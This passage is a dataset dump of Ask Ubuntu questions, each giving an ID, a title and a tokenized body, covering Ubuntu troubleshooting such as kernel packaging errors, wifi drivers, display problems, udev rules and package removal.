jul 2014 20:42:13 -0300 now , the command debuild fails to package it , the following error appear at near the end of the process : debuild ... use of uninitialized value $ filename in concatenation ( . ) or string at /usr/share/perl5/debian/debhelper/dh_lib.pm line 410. dh_systemd_start ca n't stat debian/linux-tools-3.16.0-5 : no such file or directory at /usr/bin/dh_systemd_start line 127 . ca n't stat debian/linux-cloud-tools-3.16.0-5 : no such file or directory at /usr/bin/dh_systemd_start line 127 . ca n't stat debian/linux-image-3.16.0-5-generic : no such file or directory at /usr/bin/dh_systemd_start line 127 . ca n't stat debian/linux-image-extra-3.16.0-5-generic : no such file or directory ... ... ca n't stat debian/vlan-modules-3.16.0-5-generic-di : no such file or directory at /usr/bin/dh_systemd_start line 127 . ca n't stat debian/ipmi-modules-3.16.0-5-generic-di : no such file or directory at /usr/bin/dh_systemd_start line 127 . debug : install-indep debug : binary-indep dh_installchangelogs -i dh_installdocs -i dh_compress -i dh_fixperms -i dh_installdeb -i flock -w 60 /home/tmartins/linux/source/linux-3.16.0/debian/.lock dh_gencontrol -i dh_md5sums -i dh_builddeb -i dpkg-deb : building package `linux-source-3.16.0 ' in `../linux-source-3.16.0_3.16.0-5.0_all.deb ' . dpkg-deb : building package `linux-doc ' in `../linux-doc_3.16.0-5.0_all.deb ' . dpkg-deb : building package `linux-headers-3.16.0-5 ' in `../linux-headers-3.16.0-5_3.16.0-5.0_all.deb ' . dpkg-deb : building package `linux-tools-common ' in `../linux-tools-common_3.16.0-5.0_all.deb ' . dpkg-deb : building package `linux-cloud-tools-common ' in `../linux-cloud-tools-common_3.16.0-5.0_all.deb ' . debug : install-perarch # add the tools . ... ... dpkg-deb : building package `linux-tools-3.16.0-5 ' in `../linux-tools-3.16.0-5_3.16.0-5.0_amd64.deb ' . dh_strip -plinux-cloud-tools-3.16.0-5 dh_installchangelogs -plinux-cloud-tools-3.16.0-5 dh_installdocs -plinux-cloud-tools-3.16.0-5 dh_compress -plinux-cloud-tools-3.16.0-5 dh_fixperms -plinux-cloud-tools-3.16.0-5 dh_shlibdeps -plinux-cloud-tools-3.16.0-5 dh_installdeb -plinux-cloud-tools-3.16.0-5 flock -w 60 /home/tmartins/linux/source/linux-3.16.0/debian/.lock dh_gencontrol -plinux-cloud-tools-3.16.0-5 dh_md5sums -plinux-cloud-tools-3.16.0-5 dh_builddeb -plinux-cloud-tools-3.16.0-5 dpkg-deb : building package `linux-cloud-tools-3.16.0-5 ' in `../linux-cloud-tools-3.16.0-5_3.16.0-5.0_amd64.deb ' . debug : module-check-generic install -d /home/tmartins/linux/source/linux-3.16.0/debian.master/abi/3.16.0-5.0/amd64 find /home/tmartins/linux/source/linux-3.16.0/debian/build/build-generic/ -name \*.ko | \ sed -e 's/ . *\/\ ( [ ^\/ ] *\ ) \.ko/\1/ ' | sort > /home/tmartins/linux/source/linux-3.16.0/debian.master/abi/3.16.0-5.0/amd64/generic.modules ii : checking modules for generic ... previous or current modules file missing ! /home/tmartins/linux/source/linux-3.16.0/debian.master/abi/3.16.0-5.0/amd64/generic.modules /home/tmartins/linux/source/linux-3.16.0/debian.master/abi/3.16.0-4.9/amd64/generic.modules make : *** [ module-check-generic ] error 1 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 debuild : fatal error at line 1364 : dpkg-buildpackage -rfakeroot -d -us -uc failed what more should i need to change , to bump +1 for my linux release version ( from 4.9 to 5.0 ) ? so , debuild process will finish okay ... i think that there is something to do with abi but , i 'm not a ubuntu linux kernel maintainer ( or a coder ) , so , i do n't know how to proceed from here ... i really appreciate any help ! thanks in advance !
500097	setting up usb flash drive for preseed	i 've been trying to install ubuntu-server on an old laptop . it has a screen and keyboard but the `` u '' and `` p '' keys do n't work so i ca n't type sudo or apt . i thus could not set up ssh using the generic boot disk . i tried making a preseed.cfg file and putting it in the root directory of the usb disk and editing syslinux.cfg but it did n't work . what i 'm asking is if someone could please post detailed instructions and the full text of what i need in my preseed.cfg file in order to get the server to automatically install . i 've tried several guides on the internet and looked at this website but the instructions were too vague for me to follow . i can also run any commands necessary that do n't need `` u '' or `` p '' but it would be nice if everything was automatic . but please post the entire preseed.cfg so i can just paste it in . here 's what i have in syslinux.cfg now ( generic ) : # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 0 ui gfxboot bootlogo
500100	when i connect a joystick , my pointer is moved	i 'm trying to play a game with a microsoft sidewinder ( presicion racing wheel and pedals ) . the pointer moves alone but , when i push a pedal , it stops moving . how do i fix this ?
500101	factory restore windows ?	hello , so recently i dual-booted my windows system with ubuntu , then i decided remove windows and install ubuntu 14.04 . before that , i 'm using windows 7 and upgraded to windows 8 . i have a toshiba laptop , which is by pressing 0 when booting will lead you into factory restore . in ubuntu installation options , i choose replace windows 7 with ubuntu , then all my windows files removed . today , i decided to go back to windows 7 by using the factory restore , but when i pressed 0 button , it boot straight to ubuntu/grub . i have no idea , is my factory restore partition got wiped out by ubuntu installation ? please help , thanks in advance .
500102	canon pixma ip2600 , statuf stopped	i installed my driver for my canon ip2600 printer , and it was working for a while , but for some reason . whenever i send a file to be printed i get a status of stopped . i used the ppa from this site : http : //linuxg.net/how-to-install-printer-driver-canon-pixma-ip-series-on-ubuntu/ like i said , printer was working fine , but decided to stop working . any help ! ?
500104	wifi network keeps asking for password	like the questions says . i 'm pretty sure my password is correct , but every time i enter it , it asks for it again . any suggestions ?
500106	update problem please help	i have got a problem with update and installation . $ sudo apt-get update [ sudo ] password for salman : err http : //sa.archive.ubuntu.com precise release.gpg could not connect to localhost:8080 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) how do i fix this problem ?
500108	external display hdmi out not working	i know this may be a stupid question but are samsung monitors supported in ubuntu ? i ask because i 've recently switched over from windows to ubuntu 14.04 on my laptop . i have a samsung monitor i user as a external display . the problem is it doesnât detect any output from my laptop , i check the display settings and it has detected my external display and says it 's on . can anyone help me with this ? this is having a big affect on my workload so i would appreciate any help . cheers , sam .
500111	blank screen when running cinnamon and cairo dock	here is the problem that i am haveing . when i log in using gnome w/ cairo dock i get a blank screen and a mouse cursor . i can not right click or anything . i hit alt f2 and it brings up the tty term . i try to issue cinnamon or compiz or any other manager and it just says that x has no display or something similar . i then have to issue sudo service mdm restart and it brings me back to the login screen . then i can login to cinnamon with cairo dock running with no problem . any help would be appreciated.. thanks in advance .
500112	while installing the `` universe '' source i get the following error `` failed to download repository information ''	this is my first time posting on askubuntu so forgive me if i make any mistakes in my post . about an hour ago i installed ubuntu 14.04 64-bit , i went to the ubuntu software center to install my preferred browser on the os chromium . being a freshly installed os i would have to download the repository information for the `` universe '' source . i went onto the `` more info '' section of the chromium web browser page of the software center and clicked use `` this source '' . it gave me the following error message . failed to download repository information check your internet connection . details e : gpg error : http : // dl stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) i know for a fact i have a strong internet connection , any idea how to fix this ?
500115	is necessary use clamtk with clamav ?	do i need to install clam tk when using clam av ? clam tk will not install . will clam av run automatically in the background ?
500118	14.04 lts 64 bits booting trouble	when i try to boot ubuntu , first i get the grub options and then i choose to boot . after this , the screen gets full of 1111111111111 and then continues to ubuntu logo with some commands that are displayed at the same time . at the end it just does n't boot . the only way i can get ubuntu to boot is by pressing shift before 11111111 happens . it was n't like this before , but i had a try on windows 8.1 and when i decided to reinstall ubuntu from the beginning i got the problem . i have already tried those options that appear when pressing f6 during process and those involving ahci , secure boot and some other from the bios with no positive results . so i would be grateful if someone knows how to solve this little big problem . i like ubuntu and want it to go smooth . thanks a lot ! : - ) dell inspiron 3420 core i5 4 gb ram images : https : //onedrive.live.com/redir ? resid=1cf426c9cf080abc % 21159
500119	rhythm box - ogg vorbis ubuntu 14.04	okay i 've looked at a bunch of other posts from prior versions of ubuntu . my issue is , since i updated , i ca n't extract from a cd into ogg vorbis format . it says that rhythm box needs to install additional software required to use this format . i click to install and it says plugin is not found . i 've tried the solutions from prior os versions , like setting a custom bitrate setting , closing and reopening , none of them work . looking at my plugins directory , i do n't see anything recognizably vorbis related , but some of the random letter strings could be it . is there a new issue with 14.04 ?
500124	lubuntu 12.04 , sony vaio vgn-t150 , intel pro/set wireless ( 2200 ) wireless does n't work	just installed lubuntu 12.04 on my sony vaio vgn-t150 after installing win xp again ; i had lubuntu 12.04 on the laptop but was n't getting any cpu fan operation . tried adding vaiofand but still seemed like the fan was not working , cpu temps in the 60+ range . long story short , decided to install win xp to see if fan worked under windows before taking laptop apart to check hardware ( also wanted to be able to dual-boot , so i figured this would be the easy way to do it and kill 2 birds w/1 stone ) . win xp made no difference , so pulled laptop apart and found fan was binding due to crud ; disassembled , cleaned , reinstalled - working now . that 's when i reinstalled lubuntu alongside win xp . ever since , wireless is not working in lubuntu ; wireless adapter is intel pro/set 2200 and includes bt . bt appears to be operational . etho 0 ( wired ) lan port works . in win xp , in order to use wireless , bt must be off ( ca n't use both a same time ) . i 've turned bt off using bt manager , no change . wireless switch is on . i 've read many forum posts for similar issues with this wireless adapter , so far no luck in resolving . from what i 've gathered , it is not being recognized by lubuntu . heres some data : sudo lshw -c network *-network:0 description : ethernet interface product : 82801db pro/100 ve ( mob ) ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:02:08.0 logical name : eth0 version : 83 serial : 00:01:4a:04:82 : cb size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=192.168.0.111 latency=66 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:9 memory : e0205000-e0205fff ioport:3000 ( size=64 ) *-network:1 unclaimed description : network controller physical id : b bus info : pci @ 0000:02:0b.0 version : 05 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=64 maxlatency=24 mingnt=3 resources : memory : e0206000-e0206fff question : is network:1 unclaimed the wireless adapter ? ? ? moving on : rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no i do n't see anything listed for the wireless switch - ? ? ? ? i know it works because if i switch it off , the led on the front panel turns off , so hardware-wise i 'm sure it 's working . next i tried : lspci -nn | grep -i network 02:0b.0 network controller [ 0280 ] : device [ 8080:0000 ] ( rev 05 ) honestly , not sure what this means exactly , but i think it references the unclaimed network listed previously . so i tried this next : sudo modprobe ipw2200 lsmod | grep ipw2200 ipw2200 146210 0 libipw 46732 1 ipw2200 cfg80211 178877 2 ipw2200 , libipw lib80211 14040 2 ipw2200 , libipw dmesg | grep 2200 [ 2165.049453 ] ipw2200 : intel ( r ) pro/wireless 2200/2915 network driver , 1.2.2kmprq [ 2165.049464 ] ipw2200 : copyright ( c ) 2003-2006 intel corporation i take this to mean that the driver is properly installed , hardware not recognized or `` present '' ( since comparing this output to those i saw in other posts , there seems to be a few lines of data missing ) - ? ? ? lastly i tried this : dmesg | grep eth [ 0.063806 ] i2c-core : driver [ aat2870 ] using legacy suspend method [ 0.063810 ] i2c-core : driver [ aat2870 ] using legacy resume method [ 1.631372 ] e100 0000:02:08.0 : eth0 : addr 0xe0205000 , irq 9 , mac addr 00:01:4a:04:82 : cb [ 24.708310 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 27.202263 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 27.203933 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 221.820180 ] e100 0000:02:08.0 : eth0 : nic link is up 100 mbps full duplex [ 221.820855 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 232.208048 ] eth0 : no ipv6 routers present which i assume is just telling me that my wired lan is working , but not really sure what else this might tell me . at this point i 'm pretty much lost . i 'm relatively new to linux , trying to ditch windows for good ! not sure why it seemed to work fine on my first install of lubuntu ( 32-bit , btw ) but now after the win xp install and dual-boot reinstall of lubuntu , no dice . any help would be greatly appreciated . i 'd really hate to have to reinstall lubuntu again . could i boot to a live lubuntu disk and see what happens with that , then try to figure out what is different that allows the live distro to work and not the installed one ? advice on how best to do that ( where do i look ) ? thanks in advance !
500127	setting up multiple ssl certificates on apache2 virtualhost ( s ) - 14.04 ?	i am using apache2 's virtualhost feature on my ubuntu 14.04 vps to host two websites and a subdomain , for the conversation let 's call them example1.com , example2.com and srv.example1.com . i am trying to use multiple ssl certificates for multiple domains on the same ip address . according to this tutorial , it is possible on ubuntu 12.04 . after following the article , i am able to load pages properly using http , but when the https protocal is used google chrome reports back an err_ssl_protocol_error error . i have tried running $ service apache2 restart , rebooting the server and rebooting my laptop ( which also runs ubuntu 14.04 ) , none of which have done anything to help the problem . such an error leads me to believe apache2 is n't listening for https connections and google chrome is n't getting a responce back , but i am really not sure . note : the ssl certificate i generated for example1.com is actually *.example1.com , which should cover all subdomains including www ? below are pastebin links of my apache2 config files . what am i doing wrong here , why is n't this working ? /etc/apache2/apache2.conf /etc/apache2/ports.conf /etc/apache2/sites-enabled/httpd-vhosts.conf ( if you guys need to see anymore files , comment below . )
500128	how can i install ubuntu on pcoip zero client ?	i have a pcoip zero client that uses ethernet cable to connect the server and show windows desktop ! and it uses vmware software to do this . now i want to install ubuntu 12.04 on it to can use internet on it ( at the moment when i plug out ethernet cable my desktop will disconnected and waiting for connection ) . is it possible to install ubuntu on this computer ?
500131	xubuntu - how do i map the brightness keys to run a script ?	i 'm pretty new to linux so bear with me . i have an emachines laptop ( ugh ) with fn + left arr / right arr brightness keys . these work perfectly fine in windows but do not work in xubuntu . what happens is the brightness level popup will appear as you would expect , but the brightness does not change at all , and the computer seems to lag pretty badly . i have both acpi_video0 and intel_backlight in /sys/class/backlight . modifying the acpi_video0/brightness or setting it with xbacklight does n't do anything , and acpi_backlight=vendor in the kernel did n't fix it , either . changing intel_backlight/brightness , however , does . so acpi clearly does n't work . my current fix is the following bash script which works just fine ( although you have to change the permissions for /sys/class/backlight/intel_backlight/brightness on start up in /etc/rc.local , since it 's obviously a protected file ) . /home/myusername/hb # ! /bin/bash # this script modifies the brightness level . curr= $ ( cat /sys/class/backlight/intel_backlight/brightness ) next= $ ( ( curr+ $ 1 ) ) echo $ next > /sys/class/backlight/intel_backlight/brightness` currently , i have it mapped like so : super+- to run /home/myusername/hb -50000 which decreases the brightness super+= to run /home/myusername/hb 50000 which increases the brightness anyway , all i want to do is remap the fn + arrow keys to run this script . it does n't work in the settings - > keyboard - > application shortcuts ( which is how i set the current keys ) .
500132	terminal opens to home directory	this may be solved by a simple navigation command , but all of a sudden my terminal opens to [ username : /home/username ] $ instead of the normal username @ computername : $ is this a configuration error or can i simply use a command like cd to return to the default working directory that linux users know and love
500133	xubuntu 14.04 : empty desktop on boot	my laptop worked fine earlier today , but just now i started it up and logged in , but my desktop is empty , my panels/toolbars/status bars are gone , and while i can move the mouse , right-clicking does nothing . i 've rebooted several times ( selecting both xubuntu and xfce sessions at login ) and the problem persists . xmonad sessions seem to start normally , though ( i only vaguely know how xmonad is supposed to work , though , so i only tested basic features ) .
500134	simple voice chat over command line ?	i will be using this for development . what i want is : no large proprietary blob overhead to accomplish this , like skype no account needed . so no skype account , no email , etc etc . ability to run without a gui . ability for multiple users to connect to easily . this will be used in a pair programming project i am creating , so what the program would look like is this : start program host pair programming session . would you like to enable voice chat ? yes - > wait for user 's to connect to session . remote user : input address to connect to session . prompt : voice chat is enabled . a ) do you wish to listen ? b ) do you wish to enable your microphone ? a ) yes - > speakers will now output other user 's mic input until session is ended . b ) yes - > other user can now here you on your mic if it is enabled . the goal is to avoid having the user to avoid inputting any other information than he already has .
500136	black screen after update was interrupted by laptop switching off	i completely messed up my things , i was using ubuntu 14.10 , yesterday i was updating it and during the installation my laptop got switched of as it ran out of battery and then i do not know what exactly happened , now when i switch it on all i get is a black screen with cursor blinking there , i am not that good with softwares as i am a medical student and have many important file there which i definitely do not want to loose so please let me know if this can be fixed or not i do not want to loose my things there ... and by reading many post i tried doing some things on my own so i used : ctrl+alt+f1 and then on my black screen i this little explanation about ubuntu there help site and then this error : e : error : brokencount > orun-parts : /etc/update-motd.d/90-updates-available exited with return code 255 please help : (
500138	application startup icon locked ( root )	i have installed a program , an icon appears on the desktop , but it has a picture of a lock on it , and clicking it does nothing . it 's a program i installed from a file . /home/roger/downloads/general_pss-linux_eng_suse_is_v1.00.0.r.120618.tar.bz2 i have root access , but have not been able to change the permissions . gksudo nautilus wo n't work for me sudo su wo n't work for me @ ^ & ^ & ( ( & % ^ - change , you % $ % & ^* ( + does n't work either . i 'm probably not going about it correctly . what do you advise ?
500141	huion h610 tablet	i 'm running ubuntu 14.04 and my huion h610 tablet works sort of . for example i can move the cursor with the pen and the right-click button works . however nothing else does . meaning i ca n't draw at all on any programs , gimp , mypaint etc ... i went to preferences and enabled the device which gimp and mypaint recognize . but again no drawing at all . also the buttons on the tablet dont work at all . so when i do uname -a this is returned : 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux then i also did lsusb and i get : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 256c:006e bus 003 device 002 : id 0461:4d22 primax electronics , ltd bus 003 device 004 : id 413c:2107 dell computer corp . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub then i also tried xinput list : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ huion pentablet id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ dell dell usb entry keyboard id=8 [ slave keyboard ( 3 ) ] ↳ eee pc wmi hotkeys id=11 [ slave keyboard ( 3 ) ] lsmod | grep `` huion '' returned this : hid_huion 12719 0 hid 106148 3 hid_generic , usbhid , hid_huion and finally this is the output of cat /boot/config-3 . * | grep `` huion '' : config_hid_huion=m config_hid_huion=m config_hid_huion=m config_hid_huion=m please if anyone can help me with this i would really appreciate .
500143	installing ubuntu from an external drive	so i tried installing ubuntu by following the directions on their site for installing from a usb . i do n't have a usb but i 'm doing it with an external drive and hoping for the best , but not getting it . i initially followed those steps , and when i booted , it gave me a weird error , i ca n't remember the details . but i then restarted , deleted the files from the external hard drive and downloaded them over again . again i restarted , booted from usb , and this time it gave options to try ubuntu without installing , installing , etc . i choose to install , and now it does nothing but give a blank screen with a blinking underscore in the upper left . pressing keys does nothing . ... advice ? my usual operating system is windows 7 , operating on a toshiba satellite .
500144	find the .config file for linux kernel 3.10.48	i 'm trying to compile kernel source code ( 3.10.48 ) , and i wanted to know that how can i find or retrieve the .config file for the kernel ?
500145	unsupportedclassversionerror when running java program	my java program was compiled succesfully . but when i tried to run i got exception in thread `` main '' java.lang.unsupportedclassversionerror : hello : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:643 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:323 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:268 ) could not find the main class : hello . program will exit .
500146	how to check the cpu temperatures core by core ?	i have a phenom x3-8450e which has a total of 3 cores . but when i ran `` sensors '' on a terminal this is what i get . user @ pc ~ $ sensors atk0110-acpi-0 adapter : acpi interface vcore voltage : +0.99 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.38 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.02 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +11.98 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 1985 rpm ( min = 600 rpm , max = 7200 rpm ) chassis fan speed : 0 rpm ( min = 600 rpm , max = 7200 rpm ) power fan speed : 0 rpm ( min = 600 rpm , max = 7200 rpm ) cpu temperature : +32.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +27.0°c ( high = +45.0°c , crit = +95.0°c ) as you can see it only displays `` cpu temperature : +32.0°c '' but i would like to know the individual temperature or each core . how do i do that ? thanks .
500151	i know password allthought i not get super user authentication	i enter the known password , but it does not permit me and gives below error in the display su : authentication failure .
500152	screen is black after closing the lid . still black after reboot	computer : samsung n150 , os : lubuntu 14.04 , dual boot with windows 7 i am a non-experienced user . i got a black screen after closing the lid , and restarting the computer from the on/off button does not work . i get the same black unresponsive screen , although the hard drive is running . i have tried : plugging in a different monitor some keyboard combinations booting from the usb drive i used when installing lubuntu nothing has worked .
500155	how to split a tta+cue file , and convert them to ogg ?	how to split a tta+cue file , and convert them to ogg , without losing metadata ?
500156	udevadm does n't print in terminal	so i 'm using ubuntu 14.04 and i 'm trying to create some udev rules as i have 8 identical usb rfid readers firstly i wanted to check what logical ttyusbx devices existed ( where x is 0 , 1 , 2 ... ) with the $ ls /dev but this listed the following , where there 's no ttyusbx , only ttyx and ttysx ( where x is 0 , 1 , 2 ... ) nicolai @ nicolai-k53sv : ~ $ ls /dev autofs mcelog sda2 tty24 tty57 ttys30 block mei sdb tty25 tty58 ttys31 bsg mem sdb1 tty26 tty59 ttys4 btrfs-control net sdb2 tty27 tty6 ttys5 bus network_latency sdb3 tty28 tty60 ttys6 char network_throughput sdb5 tty29 tty61 ttys7 console null sdb6 tty3 tty62 ttys8 core nvram sdb7 tty30 tty63 ttys9 cpu port sdc tty31 tty7 uhid cpu_dma_latency ppp sg0 tty32 tty8 uinput cuse psaux sg1 tty33 tty9 urandom disk ptmx sg2 tty34 ttyprintk v4l dri pts shm tty35 ttys0 vcs ecryptfs ram0 snapshot tty36 ttys1 vcs1 fb0 ram1 snd tty37 ttys10 vcs2 fb1 ram10 stderr tty38 ttys11 vcs3 fd ram11 stdin tty39 ttys12 vcs4 full ram12 stdout tty4 ttys13 vcs5 fuse ram13 tty tty40 ttys14 vcs6 hidraw0 ram14 tty0 tty41 ttys15 vcs7 hidraw1 ram15 tty1 tty42 ttys16 vcsa hpet ram2 tty10 tty43 ttys17 vcsa1 input ram3 tty11 tty44 ttys18 vcsa2 kmsg ram4 tty12 tty45 ttys19 vcsa3 kvm ram5 tty13 tty46 ttys2 vcsa4 log ram6 tty14 tty47 ttys20 vcsa5 loop0 ram7 tty15 tty48 ttys21 vcsa6 loop1 ram8 tty16 tty49 ttys22 vcsa7 loop2 ram9 tty17 tty5 ttys23 vga_arbiter loop3 random tty18 tty50 ttys24 vhci loop4 rfkill tty19 tty51 ttys25 vhost-net loop5 rtc tty2 tty52 ttys26 video0 loop6 rtc0 tty20 tty53 ttys27 zero loop7 rts51x0 tty21 tty54 ttys28 loop-control sda tty22 tty55 ttys29 mapper sda1 tty23 tty56 ttys3 here is the bus and device numbers for all usb-serial adapters : nicolai @ nicolai-k53sv : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 004 : id 058f : a014 alcor micro corp. asus integrated webcam bus 001 device 005 : id 0bda:0139 realtek semiconductor corp. rts5139 card reader controller bus 002 device 004 : id 05fe:1010 chic technology corp. optical wireless bus 002 device 005 : id 05fe:1010 chic technology corp. optical wireless so now i wanted to inspect the udevadm output to match the logical device name to the actual physical device with the following command udevadm info -- name=ttyusbx -- attribute-walk | grep num and as i did not have any ttyusbx , i just used ttyx . but when i put this into the terminal , nothing happens . it just skips to the next line : nicolai @ nicolai-k53sv : ~ $ udevadm info -- name=tty0 -- attribute-walk | grep num nicolai @ nicolai-k53sv : ~ $
500157	why does system monitor show two hard drives instead of one ?	i had to reinstall ubuntu twice ; is it possible there is still some left behind data ? i only have one hard drive , but system monitor shows as if i have 2 ? what 's with the second one ?
500162	how do i restart dnsmasq ?	i ca n't figure out how to restart dnsmasq . service dnsmasq restart dnsmasq : unrecognized service solution restart network manager service network-manager restart
500163	chrome bookmarks on unity	i 've tried lots of things to delete one bookmark from unity but i ca n't do it . it 's annoying because when i open chrome , this `` application '' replaces my chrome . i do n't know how to delete this . please help me thanks !
500164	i get error when xampp install	[ xampp is currently only availably as 32 bit application . please use a 32 bit compatility library for your system ] please give me solution for this type error
500165	only visible spaces seen ?	i recently converted ubuntu to ubuntu gnome by removing unity and installing gnome from the repositories and removed lightdm too . my account was working , but the rest of the family user accounts are having a problem . instead of letters , vertical rectangles are seen , like this . [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] gdm and my gnome is working , but others are having problems . the boxes are appearing only in all apps like terminal and firefox , chrome and others , but the gnome interface and notifications is okay . i run ubuntu gnome 14.04 . update : - switched from gdm to lightdm , and now lightdm notifications also has boxes ! please help ! update 2 : - now they are not logging in after update to gnome 3.12.2 ! they can only be logged in by a virtual console and my entire family does n't know how to use the command line ! update 3 : - here is the output of ls /var/log/apt/history . * as asked by volker siegel /var/log/apt/history.log update 4 : - i just do not care anymore about this . i am having idiotic problems and am reinstalling ubuntu . these problems never happened with my previous install of 14.04 .
500167	install ubuntu 14.04 with pxe using local repository	i 'm want to install ubuntu 14.04 amd64 server from local repository . i even create a local mirror repository with apt-mirror . the line in /etc/apt/mirror.list is : '' deb-amd64 http : //archive.ubuntu.com/ubuntu trusty main restricted universe multiverse '' . it download about 60g and finished ok . install failed with the error : '' ubuntu/dist/trusty/restricted/debian-installer/binary-amd64/packages.gz `` error 404 not found . i looked and find that directory ubuntu/dist/trusty/restricted/ contain only `` binary-amd64 and i18n directories `` i copied the file `` debian-installer/binary-amd64/packages.gz `` from ubuntu site , but then it failed with a lot of other files missing .
500168	vlc player automatically closed on suspend - ubuntu 14.04	when my system is suspended , ubuntu 14.04 automatically closes all the open vlc players . i recently migrated to 14.04 from 12.04 , and i was not facing this problem with 12.04 . i normally have one or more vlc players open , and quite often i put my system to sleep/suspend . it seems now i can not do that anymore . is this the default behaviour of 14.04 ? everytime i suspend , i have to manually go and open the media files from the start and it is very frustrating . is there a fix for this problem ?
500170	/tmp not present press s to skip or m to manual recovery . . . . .	i know the question has been asked many times , and i have gone through dozens of the answers , trying the suggestions without success . on start up i get the above message when i try mkdir , described as a solution in one of the forum answers , i get a message /tmp already exists . so it 's there ... but 12.04 lts is not seeing it . i am a bit confused , does anyone have a suggestion ?
500171	font is rendered differently in browsers on ubuntu and win 7 . ubuntu displays the fonts larger	faced with the problem of font rendering in browsers in ubuntu 14.04 . ubuntu displays the fonts larger . font arial , size 16px appears as if he was in 17px in windows 7 . page in firefox windows 7 ( font 16px ) : page in firefox ubuntu ( font 16px ) : because the font is displayed larger , breaks down menu . the last menu item , moved under the first . if put 15px , then everything is displayed normally , as it should . the problem is present in chrome and firefox . microsoft fonts installed . no extensions are not installed in browsers ( only firebug in ff ) . 100 % scale . recently installed os , no config files have not been edited . screen resolution is the same . the problem occurs in firefox and chrome . what could be the problem and how to fix it ?
500174	setting up a secure mail server ?	i am looking all over for a guide to setting up a secure mail server to be used with php and apache . can someone point me to a guide to do just that . i would like to have my own email ( myownemail @ myowndomain.com ) i have setup apache and all the other web server stuff on my ubuntu web server hosted with amazon web services . my next step is to setup a mail server . thanks for any help !
500175	how can i open port 443 ?	i 'm trying to host a small node application on a digital ocean droplet running ubuntu 14.04 . in local development the site works fine over https , however on the server the site does n't get displayed and the server does not throw an error , the connection is just refused . i ran nmap localhost and port 443 was closed . how can i open it ?
500176	kde-full and unistalling some of its packages	i installed kde using kde-full - so far so good . but when i try to unistall some of its app wich is not so neceseary to me ( like marble or kalgebra ) , apt-get remove will show me reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : knetwalk kpat kalzium-data kdepim kolf xscreensaver-gl plasma-desktopthemes-artwork ksystemlog libsdl-ttf2.0-0 krdc krfb kdesdk kscd kppp libopenbabel4 libanalitzagui4abi1 kshisen kdeartwork-style kmahjongg kopete-message-indicator kcharselect kanagram kde-baseapps libksane0 cervisia kdeartwork-theme-window knode kblocks katomic kruler plasma-containments-addons svgpart ktux kdegraphics-thumbnailers klettres kajongg kgoldrunner libknewstuff2-4 kgeography pkg-kde-tools xplanet ksnapshot plasma-wallpapers-addons translate-toolkit libkexiv2-data libcfitsio3 libkipi8 libkipi-data kaccessible kblackbox libotr2 bomber kiriki libgrantlee-gui0 kde-standard libsdl-mixer1.2 libglew1.5 kstars ttf-dustin kbruch gwenview advancecomp libmarblewidget13 python-levenshtein printer-applet kfilereplace libkggznet4 umbrello kcalc kdeplasma-addons libavogadro1 libkggzmod4 parley konsolekalendar kontact kimagemapeditor libportmidi0 kmplot kdiamond kalzium libindi-data ksirk ksquares klinkstatus klickety libkcddb4 libkateinterfaces4 